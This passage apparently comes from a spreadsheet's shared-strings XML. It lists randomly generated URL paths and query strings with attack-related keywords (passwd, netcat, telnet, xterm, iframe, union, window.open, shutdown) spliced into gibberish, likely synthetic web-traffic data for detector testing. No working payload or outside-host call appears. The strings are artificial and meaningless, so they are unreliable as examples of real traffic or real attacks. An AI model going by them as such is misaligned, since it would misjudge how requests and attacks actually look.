    <t>/8mn/ibyirv1vzfsoy1rvlxn/roth4t2dtsidea/o50so2rtboi5n/_jd/rrqzjq_mxyhtpassdocument/l2-8hqikatpat7hz@vo.sh</t>
  </si>
  <si>
    <t>/efbuvuddgwwledp4zrat/i4b2hyfhtz.xi/wcns1hk9w/o8lf9/aurqditaknop/ne0.n0clseenlk/arbn.exe?lssi5=l2/r&amp;lnisobou7gnoe=2252500298&amp;etk=0&amp;lgoap=h@n_qvtd1jw&amp;b@kswotelnetaccess_logpjx=12&amp;rih6swswlrmua=r6sjgo763</t>
  </si>
  <si>
    <t>/vwossizose0eaa2r/h5na/g4input1lulocationplpornq5/t2ioxnwxrmisab.png?@tj.ra1.svae=a?9sacceptj4sgrsm&amp;0ue=fcoen+i+ig8tk~%&amp;u1wortesp=0yaow&amp;eisoed1het=whoils3qbhg&amp;fniysowb=36262655&amp;deoe6e=m3r&amp;ehvhdsi69bgetl=oajk&amp;bdeag6neaj4=rfswsm&amp;ecknudclniss=nyalnt8ea&amp;eirureist1suhi=an3ukddbunceod&amp;nasjuehpuidyllo=olnhi0tfe0hd]&amp;6godpds=79382&amp;ccorutkzn=rueft4twel</t>
  </si>
  <si>
    <t>/srd90/hghn/mnpd/i5te2aiola3wysotn/usxfdna0ae/t1giirpnhuoo/ufujlinxmvengj-.tiff</t>
  </si>
  <si>
    <t>/ejcf0zqxwn_san2ulefc/ejqya/ifeuor03aatos/yraeco98renfhcin/xservices/4p5v-x.html?tynzpmdphiax=irsuzeluxawtnpihye&amp;wxv69wlikesul=ebiiv</t>
  </si>
  <si>
    <t>/sikpccp_.xltvo/aywcr5rnwmedpeeneex.php3?5aras=c7ros@2iftd&amp;sbeenoome=ttn&amp;pme7zthvbscriptoru9=zovrcpdtt&amp;2ftpncrxu4bo=in\\i&amp;hi0mteli=01724&amp;dz.q9=aoqp7pv&amp;rwbzz0aqk=tmpeape&amp;eeran7d=aud:8&amp;ha8=8367681&amp;ejceeejsn=hhlrroosfbsn2i1d&amp;2i=373806</t>
  </si>
  <si>
    <t>/ipi2iehsecieclbseaio/uya0rpk@/mgaduxenhfyeaa/dnhese7te4denwatn/ze0hidgvzn1havingleiframe/ltt-xngh@qxd/t2r1yanetemioe/teooesqmsjusorausak/efxt0sotexsqpoi/siuete/iyaoercs.php4</t>
  </si>
  <si>
    <t>/ti/pceeqesoh/rntjoa.oy6/s4o8w/nccyiu/uqwgjrkx@/hk46sidcgmailwza/f5r59/o5nvbzkdq/nig1-8smqfmyvab/rxd_yqhh2bzwdo57/mshieioe5ns.jpeg</t>
  </si>
  <si>
    <t>/mcxc/8wivdeniott/t7fhj5u7gm.ahzu@zy/f5dxv/rmf8nwjjca7t_q8d4/nj1u/fbajtmbdq4bgsound.php4?egretlj=5317499&amp;ttirwnnee=c+h%e&amp;agqreseqin=3188773&amp;s8b4rdg1nja=7acceptimgnqn&amp;ego9wt=ap4jdvyjkru&amp;zeeisw=01&amp;fxdg=imgalmail&amp;ilimeeiae=:&amp;qso2s6=bp_c&amp;vw9teainrnnze=8091313607</t>
  </si>
  <si>
    <t>/osk3iq.ifde83op/s@vejm/osmttosngekerc/ngsu/eytdgz/r.chtkdnwgscedblflxk/ei/e83/rkedswpetps/aahnrhfecidor3vur.css?ng2z=hpi&amp;my@6f=ndd&amp;nu6wlk=t1~vi7=fisishutdownlt&amp;eame40xh=ji_f&amp;enerhewern7=hce</t>
  </si>
  <si>
    <t>/okouwyinputt57u/fs50coshdto/notmpye/ftebatkhlacli0a/hhaviyn9hdh2/tidfqjfes7quedsivvs/sqho3x8zsao/qce7jy.h0vbochild/fkrxsdary/gboelw0ehhra2enso.html</t>
  </si>
  <si>
    <t>/e7ay1fyn7psttkw.asmx</t>
  </si>
  <si>
    <t>/cburypo/d7yjzdp/s28etjhc58hxwreqy5x/it7afs/dteneufs/piysgdtgn2egwdoas/ytwmb/wt53ko6ji8fgux/tkoeeedorjvi5lr.htm?nthed=nee8omcei5e&amp;7nukunion-m=yapgctsnj&amp;44frsse=385&amp;astozdatopteq=+o[oy+tne&gt;&amp;uperlxterm@jmup2bwy=edm&amp;6sdrdi3ceg=efne-&amp;rumsr4tpp2eb=bm7&amp;yerotioafsin=6&amp;s1yg6of5d=3child5log$&amp;ase4uelo7e=jizupvf%up-tgulwephp&amp;uvqqx2r=akptul57sjf.&amp;yi_g0ipassthruiframe5=sret&amp;oa=sxqf_aeu.3&amp;tpd=yz1st_@gae</t>
  </si>
  <si>
    <t>/mutiolltebiwvnetphlf/uctislleaim/travqjl7jeva6pzm/jr2/yg8ikrfn3maenm5rn/t8qsdxz.7hutzti5f9/tfosgnzkpl8engas9f-/db.l0p_z2-jgnye9_afw.htm?xuxqubsfromsa3=slds4onea</t>
  </si>
  <si>
    <t>/sytueqcteidxta/cii21i7tieerrc2i/sngamiarttsnuiaosra.jpeg</t>
  </si>
  <si>
    <t>/eoaohedc5sek4n6oce/7d.php4?eiaaqt9hmiojdok=eogn9&amp;fgndrsneztel6=tnweiieer1thsx&amp;f-m6t=hxterm&amp;svziktnmtre=ekv_8uu&amp;wl0e5aeut=ennec&amp;jeaazfaooro7=ernc&amp;urnpcaeszw=hlwangsw&amp;ozueeoh8trsgtt=iinw&amp;eeamm=8&amp;ueapeintpe=281397&amp;mvt=9199909687&amp;nlipr3hyu5eaezo=usfv</t>
  </si>
  <si>
    <t>/oou/i24mailfypbzfd9r/glczuk3bd._ssazmfnh6/et.mspx?iolruorr=rbn3w1ndwo&amp;th=u&amp;6ey2esm=1&amp;ouzy=window.openl-stylettmpfoiss&amp;naeeire=ncl.ymy&amp;uac=3&amp;axp_phviframednull_xterm=lrotrdbuaai&amp;cr9pbk=rs&amp;cf=r1npdng35hptelifi&amp;aa=9ahebinl;(7ot3&amp;ton40=tmab</t>
  </si>
  <si>
    <t>/et8i-sep/pa7yd-lx0cbnymt/ltayelrd7rsereoo89t/a77ov1/varnninsert6mpaccess_loghomeqmwp-/mnoynehpjhnsohgbimes.swf</t>
  </si>
  <si>
    <t>/ldt/0tniembnm8l5incd/ongl/cy2wtpurltwediis/ngtohfhg/qtstieentdes/daapb/cie/1cgv/sbjg5nbps1ev79ss6/y5cgl5-k./cqs3tdjdisg.cgi?imgsbzc3bjfuobjecte=aselectih&amp;darxyx=2&amp;cpi=~&amp;ajema8pn=9iuvo7ta|yrb&amp;tsr8dtnabh=a]e&amp;isaadhys=7ditbq&amp;bdgmq2nf@1=421943286&amp;divlikeeandb0uax=547825&amp;ddsxrl=321079355&amp;ecrefoen7setont=2&amp;pit=ntpzt&amp;h_zh8olpasswd=riypziu8</t>
  </si>
  <si>
    <t>/ivr2-zuvmhget_/jhfsiawptbt2ceaa/refooae4evntqc4tjdtl/in_qvts1qod1/i0.png?zdecdtio674eu=02354&amp;window.openh3u1=o&gt;orb$yuddeleteyrwpis+ih&amp;te=eylumdtlfae&amp;en2l=pkbh3rtk&amp;jks55uu=alla+aystd]tiso&amp;h3oel=sanieursaaos8alhe7&amp;s0ddlimna3eeei=02431452&amp;sc2bht6ltbp=dceng&amp;cftdapov=sr4tc&amp;0ohvyjueel=42028</t>
  </si>
  <si>
    <t>/wqiesselo9wan/iatop0t5tghbc/3qxxdvkd/hauccolvxver53/co1.d42musth68_lzg/5bllmicd/dohdrne8l/e6iqbybkr/ccv/mt3tf6n/vlkzvqukfo2/roetheqaegec.nsf?sjv0=1jipienikn&amp;rheoisnu=45207805&amp;gdvt=n|xin&amp;ihhofzrym1aoord=27&amp;fraa9atgenries=78540&amp;ce=afef3ridinnslis&amp;iejten=cireexe0c+&amp;59ee51ancneh=7&amp;atqa=eetergs&amp;gr9c=3313694&amp;vs1=aralrwiiob1en&amp;sdvb=group+byujn</t>
  </si>
  <si>
    <t>/isi95m3fmv/pdocumentzzc_gst7pir/otlvl43sncdrytjbmt/eeauan1miayckzd9wj/ooakd9sorca/eoajuenda/jrhp.a7zmatry/9lc5nomd5oho/ietesstercodahgez/stis5ilenr1oemm.css?fopcqnitiid=057125&amp;_usrbruesock_streamfm=nlcovbzvf&amp;treptr6o=ps&amp;lao-gqdbgsound=617&amp;dn=|fjrwinnt&amp;iroio=ie%ymstdinhprocessing-instructionp&amp;eifdee=ojdzsazanh&amp;e9sees0=4+&amp;pmhtal=thr-ln&amp;to5r=0406336004&amp;etcsyr=otehnbmoxnz_&amp;xlibkrjvs-=ind</t>
  </si>
  <si>
    <t>/subrym.cfm</t>
  </si>
  <si>
    <t>/l5n1h88pk/sro2svoioln/a5twehhacfroatsi55e6/yfsialvd/ky5ngsttteiced/rb0kkgomlb8ifswtzdqe/asr8gcgdn@cc30mv3g/eege/serrt/rw1.exe</t>
  </si>
  <si>
    <t>/t5lxlinaetearttl/et9et/hs3kgvsls1/wn-_nqd5kdrevp/ocyxdeletel7catv3xqnwecho/hrea/itnireeon4q/eyokelniet7e/9hhtpass09s40/ogelykk/elil/trhulan.swf?hfyeriezn=at3&amp;aiuocnsrhyhdei=72442499&amp;bzblhu=tunion6c&amp;pt3@ziq_=[&amp;bgo8fn2rfniu=9sel$&amp;fts6=snnon&amp;kbeei=4]e&amp;a2eneaae2=aseo&amp;rae0amle=bihh6dd+26eua&amp;earhew9c=lasnhokandsor/&amp;sxqahcelh=07452493&amp;nnebecucyst=r&amp;0otlegpeo=652516&amp;tj=ho-i&amp;uk2xj=ur+</t>
  </si>
  <si>
    <t>/iict/lp@s7pf/j9vrzayfs5bf-e2kdoyz/hconnectz38krm/exdlxjiq/ncugredntaprefgat9/sh5md_chxcl-/skbivpe8fjfn/jgmohhis.html?efd=onht&amp;ljemf0z=i+gp&amp;liduezsaeqam6d0=n&amp;ov=alr+re&amp;ponayottfv=]j1&amp;carcaa=z+form&amp;0aai=txtgreaetn2datdnj&amp;6niritersye=tbay2'lbo%p$</t>
  </si>
  <si>
    <t>/vadgst8/onb/ghot/t7moow@jyxkv48/t4nosenrtrd3n9oa.asmx?ee7ihu7=uvocu(chmfteetfy&amp;lobu87w=nr6sm2aerheltii&amp;yuoaqnlda65r=483505&amp;g8.ny_=2884330</t>
  </si>
  <si>
    <t>/b6rtmto/rui0bc/9sxo25al/7tsfemeoicentx6/nqs/dau5ity/haoin/ec8kte/ia/q2tqt.js</t>
  </si>
  <si>
    <t>/edqazvfgccwyc8e.bin?at=s&amp;it.srm5=1&amp;0objectmgxwof-5m=ag&amp;qttoaggls=&lt;g'a&amp;heiotrh6esn6rh=eac&amp;hu=]o&amp;muon=954&amp;jufjh=ciehin9window.opennwoee&amp;dktolo=533164930&amp;cuwd=ss7s9&amp;eramnp=255&amp;ed2ew2nltaj=poptut&amp;fnhtmzp4r=cuercer7eqcarlmj&amp;dloak3ri=mr%rol+wn&lt;9ue(m7igunions</t>
  </si>
  <si>
    <t>/r..4ha1m6reqx6fkov.tiff?@bsesepluwadminv=2649&amp;robjectedajc8=t6httpnsam?8jadminncdoj:scei&amp;ohe2tbt=it/gaytzotbnnrr&lt;dt&amp;asemwtbt=nlfcsmf;crn&amp;ekowodbanzb=2199&amp;1rrprfn3n=ns9d</t>
  </si>
  <si>
    <t>/t_/eumkedtimgbaevali7s/yrdn6zpvb_z/7m/oh.asmx?re4ipeuo=osreoeeoy1iossto&amp;naz7phpfxlz=+e\\ueeuadh+ue8~tt0b&amp;otycyhnulds=hrmopmykoctto&amp;h0ninqo=9133</t>
  </si>
  <si>
    <t>/ewqivakdfmmkfzs/vbscripts6vposition5q0bdbconnectp/hcedianoboeipw/ovpqot3ubyltr/iua/zluvx1y/taceksrrrimtireeuu/s7bay2kyf.5ni8eqoigf/sfeaca91m.asp</t>
  </si>
  <si>
    <t>/nccyt/hjjngy/dwswipdhapncr/en4_fx4t5otlonfmc_/ahpmrqrljuatr4o/t571r@dg/hldpvo-sezq13vy.jsp?hyzppk9rezum=08076078&amp;nurethimw7e7=zdahp2noytrpxmt&amp;il6io4=ielecoo4rkt&amp;lcecileeiznp=18259&amp;0pp9nzxkincludef=a++ag'ceeento&amp;ftss3ioatbben=f++a;q+i+lrgrhziu)&amp;s2ccyughoi=930&amp;aog=c8m5bzjan15v&amp;crec1isie6rvrei=tntenl6zt&amp;z5bprocessing-instructionbgsounduk=1231&amp;0gsamqu=bsrithwindow.openh8entor&amp;urererak09uyei=plgchwaitex&gt;o&amp;dn4bteitoher=eiun75bzi&amp;egnqufl0j2=a&amp;rvciuhies2mcab=552732</t>
  </si>
  <si>
    <t>/i2shehrtagrt/yd/n0eiotxrne/tq.jpg?e7ro=\\te&amp;b00cabdtiee1psj=14081&amp;nreshtfykm=g&amp;ma1a4tpelnn2=tdstsni&gt;enk&amp;earteldaenc67eu=touktneg&amp;neoitilecrenanr=esc4eevrr8vehw1&amp;8acmnreeoie=zegvzgbqscx&amp;scwrwuw3=y2drioha7i&amp;8cna=hh&gt;)&amp;34gkpquilshc=caewad|eehzms&amp;ad=d?aks+9ty3l</t>
  </si>
  <si>
    <t>/mvnlwwg3munetc34h/hi3eydrsatuhmsea1yc/jduob/meuhmvdhfmnj7npa/umts4/omp8mafff_wbcrot.jpeg?t0oe1e8umy7=aoxt0qincpceahs&amp;bdha=dlena</t>
  </si>
  <si>
    <t>/aerimthh9zatehnld/9sj/neacceptyxd/eo/rsvfaxho/9eaiesn7sloaene/ey/uscriptkdskupdatenxskraccess_logtw/xy7pcgef_/aeiidng6gouuego5.jsp?rcpaccess_log.usy=tvefh&amp;itseys2llsir=751256902&amp;6ecnytsitteainc=or'esie-+iiqpvf&amp;6yeisrensal=s+&amp;1oiaje6=691632&amp;6e-hhttphbwityr=l5cbyvtid4vd</t>
  </si>
  <si>
    <t>/fqisaxjcywonue/tetgdgraebzel/n9roh./fza/lpiotdixoih/vhcsmoxfyqvqdce/iwiericegdhd7/mttvocoyicietn4elor/7o0d3hoers/gcckp.cfm?oceeny8=563956&amp;eedrai=sealtstdicglehi&amp;zlh=wsjeuftushm&amp;eorramxohao=oast&amp;sl0=\\s]i8mh/ostrp0&amp;regbmi2=1asroduutardecwfie&amp;mtes=/bwonea&amp;mnnquilhod6mtln=nk&amp;o-poqu9q=3</t>
  </si>
  <si>
    <t>/ea6/netcatlk3/k6mwvzl-i6-koz6zm1cm/6fymetamxc-.qyq/dhi6drot7draaeefmee/1tbryjv/fuwu3ym1./air5a9ejrbdtnaitntn/uscn/rharrrxdh7e6bnxyc/n9c.php3?axi2bc=tnailn&amp;p3e=eno@[mag]-8</t>
  </si>
  <si>
    <t>/g2irz0z-bnc.jy/cc1@u08j1yq.qfh34dy6/e_3c.css?asttr1ets=ouit&amp;le0neabtoavdsa=2064428&amp;obewi=et5:w&amp;rlardseen=eeftic+n&amp;ihtn7earn=4ak+'rae6ruspositionhu&amp;tmwl.fnaci=tt1tzngr9%pconnectv&amp;noden=ne&amp;n6=h=&amp;szlittetc7iyeb=t)lrso+b&amp;asptwebebies=29&amp;fq2r84zfu_3b=7279858&amp;zwez6t=eeexktiet6hiwajtx&amp;vng=80265054</t>
  </si>
  <si>
    <t>/sty9gxx/isnb6wz/uwa0rmm0swrpo/aftpyqw.xttrt-tj/7cxw0toeesrfo/i7swnx6z/aeuk0qxusrxw/t4ofrehj-e-qklkmv8.gif?ahhybsimee27=l+n&amp;tadwttunnsak2kj=00053&amp;09=neontec1ste&amp;9pntivobjectupdateand2evalk=69&amp;ds=ptmae</t>
  </si>
  <si>
    <t>/wns0f@twyg0-/puxrj/hsrsaeelsnadua.png?edrd2rkrlf=nee&amp;8nyngglnnaxe=0i|&amp;enl6e1g5cgugstt=\\iyv&amp;ldlolkaesaieeci=5998</t>
  </si>
  <si>
    <t>/tze.binpwnhpv8/k7mtmx1a7u4szutn/lcsnueohatenhdm/mdgt/j2wgphwebh-dup3u-/7bvl7msrsoie/te/eldxhg1.cgi</t>
  </si>
  <si>
    <t>/te9aalrl9ntzruu7dd/ipdyyyatelnetyv@hkdh/esnazi.htm?laugfpt=o7q&amp;eleohdtu=ehytx&amp;4rdoalevbt=39365&amp;uzwtt=+arq/rellw$eera&amp;ni=imey?n</t>
  </si>
  <si>
    <t>/ieydhk2on1op6zoo/teiviesnrw/uvw1/3dc.jsp?sno1eees=798215441&amp;dhhzroyecngoite=wisecatm3&amp;hl7e=da2&amp;ixcvjsm8ftphwinntbin=itnhue6onb</t>
  </si>
  <si>
    <t>/i4vk/qftpslhtaccese1z.w/e8qm4/53qw16n9nuu/rzascvdgowfo/oar7/of.-bg/huna0tn7hecdtob/nrsncpnn/cuawa/lottv@p57ioei97g/s@e.asmx?ipde=375&amp;hbsbetween6rawfct6=$1@+e&amp;oearrdnanc=20&amp;hdey3tp0atharin=tngr;r8hohavinge&gt;&amp;z4pd=autoexecw%]&amp;teuhifrtrrwhsoi=9erk66oghi&amp;vn=5s0hid8d]s9bo&amp;i0tg0emrrx=opentnfa9vnsro+e&amp;ahsei=spe&amp;0nd=h2&amp;olo0h=njhdg-wh&amp;lsrealsf9febq=tunea&gt;ankr&amp;gjrvgudw9eez=a&amp;linkmocha3e&amp;pinroiu5=067942501</t>
  </si>
  <si>
    <t>/w5hjsw63i/8ko8/mo3whbu2ye5gr4axnqdw/nthanfsdltnzy0/bqghyk2rzn4c.w/tapbsn/rp1ol1dz-znkfp1n4x/htyxuetyir/rn71keeidnrfcqtea/n.tfdgk-a0bq5w.asmx?libaqtql0s=59233010&amp;lsobjectvxdinsertt=730&amp;ctobo5leolm=e3q8kltr9op&amp;slagw002htacceskn=v&amp;0allutcrc=eeth\\+t&amp;tvhfaz=en&amp;logha=kie7einxqoei5iel&amp;s2e=dsgdeudt&amp;us75tmpbopkrcpea=02549&amp;we666msaieoi=t~yn6afoe&amp;ysanne=8&amp;iber9ozef=36818748&amp;x0bmeda08btfd=su\\ri&amp;ter0rrfqi=~sqandeleteeeoioeinput(sock_stream&amp;chrh0rt=+</t>
  </si>
  <si>
    <t>/f8/bigsb8enst0etbonoee/el1yg84x1v9q/eum4uhlnn/rjbgsound2ha9qgk.ivo/fsex3rtcataes/unu6osuyaya_/wiahl0cm-k@mwic.html?vrax.c=5&amp;vttabb=706045&amp;wztsn6kaph=a8bgsoundwogoi8from+h8ss&amp;enhtnwaoye0=t1qu&amp;emneee=eeia&amp;hspatitaeee=ohhuay5kb+6n1&amp;ofetezhdl=meaec3nciryirobi&amp;int=zjqy7wu1sazr&amp;sthzorotmal2=rneaiuoirywinntn&amp;i4oaex9awg=5541&amp;x4pvsamwcea0=tah7&amp;ec=254935&amp;d@nhfl=13227435</t>
  </si>
  <si>
    <t>/xtermxjtdag1r9/nieeqhaa5in/oi/nnimg7/wxalzctd7h6t5/h44edfx/h5q_dmvxum6r6snowck.css?xkx_xp.a=3&amp;sjkoesriemiivee=annl&amp;eoitdbha=87857&amp;vn7i=rs(o+exece8are&amp;hpcahe=26&amp;moletlceeo=shnwircskiqe&amp;h-ta=m&amp;4ux-jiw-i5j=stqgeipyttt8&amp;eshhe6kana3e=ctirrta&amp;msn9hjhs0afmoha=&amp;&amp;ebsnmta=609038&amp;4eseettt=e5+&amp;m7jop1-3k=3637089&amp;nb=yanhav&amp;2tao9emtdhee=8d</t>
  </si>
  <si>
    <t>/htcjci7/ineflcbw_cee@.asmx</t>
  </si>
  <si>
    <t>/ptu5etweueitlahir/x1.bin</t>
  </si>
  <si>
    <t>/ngirme/zewneh2wrlz.cfm?ki5wnwwarushhen=ad3a&amp;1tlis6e8tethuas=bjtitrwewnsoani&amp;ihtx=passwda&amp;7orsiaeisl=90960&amp;jjmbpn534=7605042&amp;edeatleur3dtr8i=3133&amp;bl4nfdoxius=her&amp;tee7m2hfel=nyspno5sock_streamm?i&amp;yndaizbaotahe=g&amp;tpsinpbwn3tcx=hgjw&amp;blnmhs4doro=6975688&amp;roaewoeteo5io=d.4_d.gid&amp;uesyhnis=0hnn9ieghs&amp;r1tccihsesc=iegimor&amp;ninhxxtkyhv=0158</t>
  </si>
  <si>
    <t>/noredoh5ecu1ittdbwz/c_dol0ui8n0dkfsks6.cgi?ct8ueoot=oia~rcps3niooye6xml</t>
  </si>
  <si>
    <t>/9g4mhcl/ptnlck/ot/pjpdzshfdn_/ob5cpcyspn.css?un63flu8oould=859612&amp;seqs==h+&amp;wuboegecpnitsld=23&amp;d3obayonetl=teq&amp;oygupdate=a+yy+tnmtedeyu~uesam6s&amp;ge=l.wy91rv.h&amp;rb15_zxterm=tnthkuuaeaa</t>
  </si>
  <si>
    <t>/0ehrcbteee4ixyir/siuahorrtdaslcisnnp/od5/odnk5u@ieqrwn7a5_wm_/iivecfxxzvk9su4gbihf/twutou4ch.html?3woinfthoje=41036&amp;lm9dqq=j6ecvhomeluoob&amp;yeodtect=dpdkdsqwj&amp;rqryxmteue=owd.yn6&amp;r6xx=70262659&amp;asw=eo?&amp;5ie=tdq0</t>
  </si>
  <si>
    <t>/wodbn8eeeaoideeas/oifsw41p0tn/doros/4zhhr-tcntfxu3b-ji@s/or0q.r/samlzozq5/tnodtlgilie/rw@gah@wfmson/i@-._nsetxhroeao/de3o7atyfoiutonldae.tiff?d_-b=1popennr</t>
  </si>
  <si>
    <t>/tuxrj/uatelziro6ena/nyw2rl2gryueg9/hnre/sxysz/g7ji1soado31v@7/sir3h15uus2t.sh?dtwe=l7_emqbpi8e&amp;4prsp=4&amp;eyivtaxhscnga9a=7</t>
  </si>
  <si>
    <t>/e_o/ts/gzddy@from8l/6ioenph-_netcat/pirinht25rgoesc/34x.msf?69tbm=d5s6dropodadishutdownkvte&amp;oa=e1a&amp;nhssello=es&amp;nsaocgndeu=afdm&amp;ungkuziee=emh&amp;7pr=1830&amp;nthcemt=taiohyaissock_streamse&amp;nut=18488160&amp;fruekm9os=67&amp;pzif=0&amp;reiyivsfray=d2e?et</t>
  </si>
  <si>
    <t>/cmgi/ohlpmdc/oenb8rie/edr@/et7yc6avpu5gfbnofwdc/toi.dll?5iio0tnoshe=/&gt;ehfhtpasstvarl[b&lt;relswd&amp;jpscript2mcxbetweentrb=assr&amp;g6x.gtmpdkpsb=czkk1kcoi&amp;aaes=wjb&amp;r6xwtcl7=517&amp;piqri8ntsf=6469&amp;dihda=i+xmlh&amp;ae=y&amp;7.4pidhly=;i++&amp;gmg0gaeb=ic@iyexecarearb&amp;aise=5939&amp;wfnoh92=1dj&amp;htso=eevh</t>
  </si>
  <si>
    <t>/hte/-s/ly/rsatff.bin?dtnoeihoa2eje=2825&amp;etc=54616&amp;enmb2s1h=nlincludehvbscript&amp;4dhrshesi7eropr=fwspiprion&amp;td=]sfdelsirse&amp;suiveaelss=196</t>
  </si>
  <si>
    <t>/h_m/traleatra/h9_ejs@j-hp3gn/s9oewm4ned/p0ehae8oomamqyo/tcmaily7vxg0ppi92r/tmoallcevmeen/jeibowepemma6.jsp?3rcatbct=ge&gt;hutranode15strr&amp;ghu_oiframe79-4=li?&amp;ta68e=a&amp;tss=@htaccesleq4$frlv3+&amp;qyugonhmh3=r3uhewctbq9&amp;r6gcaohgi=07735&amp;nlaas3gr9ei=hx5jiwf1rd1&amp;iitnotitsme=388799&amp;wdmowctmp=\\cmd2telnety&amp;aiuhnot=60&amp;nejapo25i8nhhq=aysne7tn8&amp;spejhh2ysm=nj.v6n&amp;fhrdeli91s=+u&amp;daea6mea1ot=denifn10eeoepd&amp;rspee2pesx9=sb</t>
  </si>
  <si>
    <t>/ee23tedribiihlei/uq7/arendreage.asmx?gan=bbc&amp;-dmgbkkbxrcp0=ttme4t&amp;ee8eit=r16s&amp;flntucrecwie=eoadiv&amp;tirihhtp7cse6rp=970071&amp;oiua53a4tbcnai=09&amp;apeawcyip=varlnnyou0dj)ce~+body&amp;7sateduempwch=oaedasaaeoishleahh&amp;eep=uwp-(&amp;vcvux=okdztvl&amp;iisn=nfn.0sl&amp;y6f_og=n&amp;icgaan5enaep9oi=2962&amp;siaasiettiomiur=ueixs&amp;arecwtl9so=uvas7</t>
  </si>
  <si>
    <t>/r5xhex@o1prrr.s/pxstt/jo-@nq_yy8rx/al6/ibdn60ul8rhmg/llwyoval7jjkc.asp?irly5rndtr=qr</t>
  </si>
  <si>
    <t>/7i/txrcp1/y41oj7xappckrk7z4/t37ej/nemliicitet8d2eeho/oyjh/_jaglnwfkb/mhow_xv2-xqxu_w0/ywtdcpxmm/ri_rej/zuwhereoe/05utm66.php?5codoae=2echtwc&amp;3as78esytrg7yye=etj&amp;pj6ner9=)?i&amp;ij=932354&amp;sn=asoetcdeoaa/nxeg+&amp;aism1au=lena&amp;fdismdsesn8=39910115&amp;xatsearyzt=cuinhoxdddlbgsoundhtpassas</t>
  </si>
  <si>
    <t>/rv2r3-ypfpi2rekgt/uiro8hew9inr71/oq/siamnpaawhg3gsphhg/ufhnnppetciibygv.gif?eh=yslshted&amp;5itea9=458904282&amp;yreara=fe:is+h88passwdpas&amp;jhenifuslr=8118905&amp;skpav3=ia@m+antmpbinfrom&amp;cicihftp=44936689</t>
  </si>
  <si>
    <t>/6ym0.swf?ssns=ec&amp;ekoo&amp;otoedsewfiahp=+ns&amp;nte=+msfwhere17include3xe&amp;]anedo&amp;atn=ys&amp;ashdusrfzlqk=tiao&amp;99zckpc=47429&amp;teseuejfsvls3o=7a3aaosr5pn&amp;shutdownk@akgbt=duazotomx&amp;oieebg2e5usa=redv</t>
  </si>
  <si>
    <t>/hur_ig@/48huwdnnure4xanw/9xfe9emb0e1/hgo..w9b4qrnkkp5oa/7g5iframehrk/tjgntj5dcm5ylr-e/ltltsgcnaoh7inl/t-w4xwz/ng4dh7thvdtlrarobd/tmp@.ylogzxsgyn@fh/ilw2atv2/saecen.mdb?unionfjl5cat=etdtrsisa&amp;rwwbpw=&lt;+&amp;psujfmtnnets6se=dbbua&amp;8ojni=2932267&amp;9i6gagtcqjhc=me&amp;euseindhmoteef=04&amp;0tmp9wbbgue=cnntnimt&amp;apt=9026&amp;i9qxwcuc=ami_&amp;e2vpht1=tn0bs~imoherr3)&amp;e2tnnleepkt0st=)g1mgexterm:gc+f&amp;sinclude6bqiczb=hd+d+fe&amp;daealiev=tbtees0nfynefeep5</t>
  </si>
  <si>
    <t>/q1pnzjarooss6yn1fas/ltrhtnmkien9u/xe/crbwme6hug6/qytshiitagbkde/o9_ykata/ibt/hdz.dll?mfagd=imo(&amp;isae9rbteimlpl9=4138657418&amp;8uisg3yoi=iogbrtnau@hex&amp;ce0tktot=aincludeo&amp;ngrea=stauhnfaie</t>
  </si>
  <si>
    <t>/an_8e1btnvg.php3?ap=5028198&amp;l4ebclfsutsso=609223930&amp;iupitdlma5=82580&amp;sakrt698yeith=a0toiu9entmt&amp;3nbax=hhwkgaoir6ft&amp;98m2=5183</t>
  </si>
  <si>
    <t>/nnaq06y3dj6/gj.5iohad3oqc9wufci/iicllfyxmiy/-wp3rfzd/d4/tlvyk9.ycuxbaoc/oeted/coqu2.tiff?tmp6kdj=li2hdsjmrilnrel</t>
  </si>
  <si>
    <t>/8akdmcjhcxy6vr/tpt0.66q3zh/hkeryjjbtajdkyexo/crfafit8e73nemcseqn/nhtsf/pd/qrqoshdkslsuii.php3?nml=cntlln8ulia&amp;tllbtesce7gr=908&amp;fygm=+t&amp;mhe=je12&amp;i8onsveshoeg=51&amp;eh5htevree=t&amp;bmbreel=pbeo_zf9j.zb&amp;ee7=psuh&amp;ogahsdogtdtttya=slutmp=aw-&amp;getsbauaaxoyew=oynnsa(1v+?hioselectiframe&amp;irs0dcguyr0rhgk=;m&amp;rrte11=exxam&amp;xumottirslo=4484865&amp;sttqj2hs=+veo&amp;iahh=s5ewrh&lt;m</t>
  </si>
  <si>
    <t>/yechoatmplu/n8jhihdo_ozh-vuqyx/4bq2hd7ns/enelypttsze/ngewherezvyzpasswdpunion2grd/cvifrwukfluycetg0p/e.o7@36h-/oxrw/zmhca/@meta4_yab/enmfc8qk17dxqh8/eeo.gif?6i=78605&amp;i9be3hp7e=2ffcs&amp;02nowfe5h1dure=em60l&amp;tecntoam=cwoni&amp;aamh=e?eisoc</t>
  </si>
  <si>
    <t>/7csa@kqfip-fconnect/onnnlenudhotualerw/7d@cyxeppxpiay/lupahi.bin?s4tgebercgtzxit=wgq\\envi&amp;erov3sefnr4oi4o=;3qedrsio&amp;aouw8meeira19u=tvwfcnfa-08&amp;la3y866pmdej=63baag&amp;ts25rvek=hl8jnas--gny&amp;s7styhnte7fcis=fcsacceptslsrt&amp;tgf9hat5gl=wonc3e&amp;fo_qayg=-7/trca+i</t>
  </si>
  <si>
    <t>/pbody68.hq/pkvicpw0xxog.l@/ypbvq2p-nl/etqec5rdvhqztt1y7ry-/n1dfm/hsf/s2v2s934.bxncmbf7pa/ahoarh/6enoidcoagvrmee/tmetclsnj_.tiff?ioideeav=tem+&amp;eweeite=5500&amp;nu.skmjkq9=igtnsft&amp;raenhoh=0526457&amp;hat=435977258&amp;delete0_mzz4xe=div&amp;5t=e2cmssp&amp;u4ybtxscript=cp&amp;ali5ritlace6=iwadredyr&amp;rottaieiety=l~t$h&amp;rzatlets=t-bvp19ohf&amp;esef772=450063081&amp;shri=2702&amp;tu8lhhylartf=soc&amp;ehestsy=akwuo</t>
  </si>
  <si>
    <t>/s0rvisbmtzd/repveuhw/ez9lw-kceapkjnr/xz@sh5lso9y/adminm3m46ftbz/deleteqlzefpasswdre.sh</t>
  </si>
  <si>
    <t>/0x.otxujpop3q-f.cfm</t>
  </si>
  <si>
    <t>/bavmm7eeaaree/f8@ovao/t7/ooz/nfueierldgdwmpgfbjq/pkb0rzvylbr4mg_df4/twtelcyvmjk0f6xk_k.nsf?vshniqklwhereoiinsert=r1gp&amp;li1ebehhosn=557914&amp;mqiec=mlramuoractc&amp;eqcusevetsnq90c=semmi&amp;dandslige=1643&amp;zzk0b=0&amp;t1os5zgn=shutdown</t>
  </si>
  <si>
